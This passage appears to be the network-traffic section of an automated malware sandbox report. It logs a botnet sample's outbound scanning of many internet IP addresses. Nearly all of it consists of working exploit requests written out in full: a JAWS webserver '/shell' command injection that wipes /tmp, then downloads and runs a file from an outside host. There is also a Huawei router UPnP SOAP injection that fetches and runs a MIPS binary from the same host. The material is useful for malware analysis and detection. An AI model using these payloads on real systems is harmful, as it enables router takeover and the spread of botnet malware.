                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    115192.168.2.2350164102.137.240.13480
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258378983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    116192.168.2.2358878109.62.119.780
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258431911 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    117192.168.2.2345998153.78.233.7980
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258469105 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    118192.168.2.2349510173.230.32.4680
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258497000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    119192.168.2.2354382198.165.232.5280
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258528948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    120192.168.2.2336248201.125.207.17180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258563042 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    121192.168.2.2333208173.72.159.11180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258599997 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    122192.168.2.233555885.42.189.13780
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382489920 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    123192.168.2.2340114212.53.111.20880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382667065 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    124192.168.2.2357802137.224.169.14180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382690907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    125192.168.2.2349178124.224.219.16880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382788897 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    126192.168.2.23556308.255.164.12880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382837057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    127192.168.2.2354236208.132.145.17980
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382863045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    128192.168.2.2359728105.172.5.16880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382901907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    129192.168.2.2348998176.1.7.980
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382955074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    130192.168.2.2356716173.230.39.23580
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.382981062 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    131192.168.2.2337594159.108.60.22680
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.383008957 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    132192.168.2.233556678.65.198.15080
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.383024931 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    133192.168.2.2352372175.75.70.5480
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.383047104 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    134192.168.2.2354064197.191.214.2037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.091348886 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    135192.168.2.234969668.152.141.25180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255425930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    136192.168.2.2345984141.145.232.22980
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255465984 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    137192.168.2.233419025.167.5.21480
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255482912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    138192.168.2.2339326117.50.49.12580
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255518913 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    139192.168.2.2356908158.79.170.5880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255537033 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    140192.168.2.2353000203.176.98.17880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255556107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    141192.168.2.2347508164.21.186.7280
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255580902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    142192.168.2.2335602144.147.255.22180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.255624056 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    143192.168.2.2357656156.207.68.21737215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.339448929 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    144192.168.2.2348012156.33.52.21737215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.339699030 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    145192.168.2.2356764156.191.36.9337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.339720964 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    146192.168.2.2345350156.131.234.24537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.339759111 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    147192.168.2.236063041.206.186.4337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.339780092 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
